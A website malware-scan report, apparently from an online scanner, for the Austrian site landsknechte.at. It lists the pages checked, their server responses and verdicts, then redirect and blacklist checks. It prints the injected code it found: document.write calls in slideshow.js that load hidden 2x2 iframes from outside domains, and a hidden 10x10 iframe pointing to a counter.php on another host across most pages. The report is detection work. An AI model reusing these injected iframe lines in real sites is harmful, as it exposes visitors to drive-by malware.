Scanned pages/files
Request | Server response | Status |
http://landsknechte.at/ | HTTP/1.1 302 Found Connection: close Date: Tue, 23 Sep 2014 23:52:24 GMT Location: http://www.landsknechte.at/ Server: Apache Content-Length: 276 Content-Type: text/html; charset=iso-8859-1 | clean |
http://www.landsknechte.at/ | HTTP/1.1 200 OK Connection: close Date: Tue, 23 Sep 2014 23:52:24 GMT Server: Apache Content-Type: text/html | clean |
http://www.landsknechte.at/main.php | 200 OK Content-Length: 4690 Content-Type: text/html | suspicious |
Hidden iFrame found. size: 10x10 style: hidden src: http://www.clintech.cl/counter.php <iframe src="http://www.clintech.cl/counter.php" style="visibility: hidden; position: absolute; left: 0px; top: 0px" width="10" height="10"/> | ||
http://www.landsknechte.at/./scripts/slideshow.js | 200 OK Content-Length: 2534 Content-Type: application/x-javascript | malicious |
Malicious code - confirmed by antiviruses (see below) document.write('<iframe name=Twitter scrolling=auto frameborder=no align=center height=2 width=2 src=http://sandyatlas.com/moaf.html?j=1003873></iframe>');
document.write('<iframe name=Twitter scrolling=auto frameborder=no align=center height=2 width=2 src=http://sagverket.se/whmd.html?j=1003873></iframe>'); window.addEventListener?window.addEventListener("load",so_init,false):window.attachEvent("onload",so_init); var d=document, bilder = new Arr obj.style.filter = "alpha(opacity=" + (obj.xOpacity*100) + ")"; } } function neuesBild() { if ( (aktuell < (bilderAnzahl-2)) && (bilder.length < bilderAnzahl) ) { bilder[aktuell+2] = new Image(); bilder[aktuell+2].src = bilderPfad + "0" + ((aktuell+3)<10 ? "0" + (aktuell+3) : (aktuell+3)) + ".jpg" bilder[aktuell+2].xOpacity = 0; d.getElementById("slideshow").appendChild(bilder[aktuell+2]); } } Antivirus reports:
Hidden iFrame found. size: 2x2 src: http://sagverket.se/whmd.html?j=1003873 <iframe name=twitter scrolling=auto frameborder=no align=center height=2 width=2 src=http://sagverket.se/whmd.html?j=1003873> Hidden iFrame found. size: 2x2 src: http://sandyatlas.com/moaf.html?j=1003873 <iframe name=twitter scrolling=auto frameborder=no align=center height=2 width=2 src=http://sandyatlas.com/moaf.html?j=1003873> | ||
http://landsknechte.at/main.php | HTTP/1.1 302 Found Connection: close Date: Tue, 23 Sep 2014 23:52:26 GMT Location: http://www.landsknechte.at/main.php Server: Apache Content-Length: 284 Content-Type: text/html; charset=iso-8859-1 | clean |
http://www.landsknechte.at/test404page.js | 404 Not Found Content-Length: 2918 Content-Type: text/html | clean |
http://landsknechte.at/aktuell.php | HTTP/1.1 302 Found Connection: close Date: Tue, 23 Sep 2014 23:52:26 GMT Location: http://www.landsknechte.at/aktuell.php Server: Apache Content-Length: 287 Content-Type: text/html; charset=iso-8859-1 | clean |
http://www.landsknechte.at/aktuell.php | 200 OK Content-Length: 5244 Content-Type: text/html | suspicious |
Hidden iFrame found. size: 10x10 style: hidden src: http://www.clintech.cl/counter.php <iframe src="http://www.clintech.cl/counter.php" style="visibility: hidden; position: absolute; left: 0px; top: 0px" width="10" height="10"/> | ||
http://www.landsknechte.at/aktiv.php | 200 OK Content-Length: 18021 Content-Type: text/html | suspicious |
Hidden iFrame found. size: 10x10 style: hidden src: http://www.clintech.cl/counter.php <iframe src="http://www.clintech.cl/counter.php" style="visibility: hidden; position: absolute; left: 0px; top: 0px" width="10" height="10"/> | ||
http://www.landsknechte.at/vergangen.php | 200 OK Content-Length: 18549 Content-Type: text/html | suspicious |
Hidden iFrame found. size: 10x10 style: hidden src: http://www.clintech.cl/counter.php <iframe src="http://www.clintech.cl/counter.php" style="visibility: hidden; position: absolute; left: 0px; top: 0px" width="10" height="10"/> | ||
http://www.landsknechte.at/vormann.php | 200 OK Content-Length: 5460 Content-Type: text/html | suspicious |
Hidden iFrame found. size: 10x10 style: hidden src: http://www.clintech.cl/counter.php <iframe src="http://www.clintech.cl/counter.php" style="visibility: hidden; position: absolute; left: 0px; top: 0px" width="10" height="10"/> | ||
http://www.landsknechte.at/hist.php?page=lkdoc01 | 200 OK Content-Length: 6878 Content-Type: text/html | suspicious |
Hidden iFrame found. size: 10x10 style: hidden src: http://www.clintech.cl/counter.php <iframe src="http://www.clintech.cl/counter.php" style="visibility: hidden; position: absolute; left: 0px; top: 0px" width="10" height="10"/> | ||
http://www.landsknechte.at/lied.php | 200 OK Content-Length: 6655 Content-Type: text/html | suspicious |
Hidden iFrame found. size: 10x10 style: hidden src: http://www.clintech.cl/counter.php <iframe src="http://www.clintech.cl/counter.php" style="visibility: hidden; position: absolute; left: 0px; top: 0px" width="10" height="10"/> | ||
http://www.landsknechte.at/service.php | 404 Not Found Content-Length: 2918 Content-Type: text/html | clean |
http://www.landsknechte.at/n_gb.php | 200 OK Content-Length: 4188 Content-Type: text/html | suspicious |
Hidden iFrame found. size: 10x10 style: hidden src: http://www.clintech.cl/counter.php <iframe src="http://www.clintech.cl/counter.php" style="visibility: hidden; position: absolute; left: 0px; top: 0px" width="10" height="10"/> | ||
http://www.landsknechte.at/hanana.php | 200 OK Content-Length: 6441 Content-Type: text/html | suspicious |
Hidden iFrame found. size: 10x10 style: hidden src: http://www.clintech.cl/counter.php <iframe src="http://www.clintech.cl/counter.php" style="visibility: hidden; position: absolute; left: 0px; top: 0px" width="10" height="10"/> | ||
http://www.landsknechte.at/aktiv.php?act=cat&sort=titleup | 200 OK Content-Length: 18021 Content-Type: text/html | suspicious |
Hidden iFrame found. size: 10x10 style: hidden src: http://www.clintech.cl/counter.php <iframe src="http://www.clintech.cl/counter.php" style="visibility: hidden; position: absolute; left: 0px; top: 0px" width="10" height="10"/> | ||
http://www.landsknechte.at/aktiv.php?act=cat&sort=titledown | 200 OK Content-Length: 18021 Content-Type: text/html | suspicious |
Hidden iFrame found. size: 10x10 style: hidden src: http://www.clintech.cl/counter.php <iframe src="http://www.clintech.cl/counter.php" style="visibility: hidden; position: absolute; left: 0px; top: 0px" width="10" height="10"/> | ||
http://www.landsknechte.at/aktiv.php?act=cat&sort=timeup | 200 OK Content-Length: 18021 Content-Type: text/html | suspicious |
Hidden iFrame found. size: 10x10 style: hidden src: http://www.clintech.cl/counter.php <iframe src="http://www.clintech.cl/counter.php" style="visibility: hidden; position: absolute; left: 0px; top: 0px" width="10" height="10"/> |
Malicious Redirects
First query (normal visit):
GET / HTTP/1.1
Host: landsknechte.at
Result:
HTTP/1.1 302 Found
Connection: close
Date: Tue, 23 Sep 2014 23:52:24 GMT
Location: http://www.landsknechte.at/
Server: Apache
Content-Length: 276
Content-Type: text/html; charset=iso-8859-1
...276 bytes of data.
GET / HTTP/1.1
Host: landsknechte.at
Result:
HTTP/1.1 302 Found
Connection: close
Date: Tue, 23 Sep 2014 23:52:24 GMT
Location: http://www.landsknechte.at/
Server: Apache
Content-Length: 276
Content-Type: text/html; charset=iso-8859-1
...276 bytes of data.
Second query (visit from search engine):
GET / HTTP/1.1
Host: landsknechte.at
Referer: http://www.google.com/search?q=landsknechte.at
Result:
The result is similar to the first query. There are no suspicious redirects found.
GET / HTTP/1.1
Host: landsknechte.at
Referer: http://www.google.com/search?q=landsknechte.at
Result:
The result is similar to the first query. There are no suspicious redirects found.
Safe Browsing / Blacklists
Query: http://www.google.com/safebrowsing/diagnostic?site=landsknechte.at
Result: This site is not currently listed as suspicious.
Result: This site is not currently listed as suspicious.
Query: http://yandex.com/infected?l10n=en&url=http://landsknechte.at/
Result: landsknechte.at is not infected or malware details are not published yet.
Result: landsknechte.at is not infected or malware details are not published yet.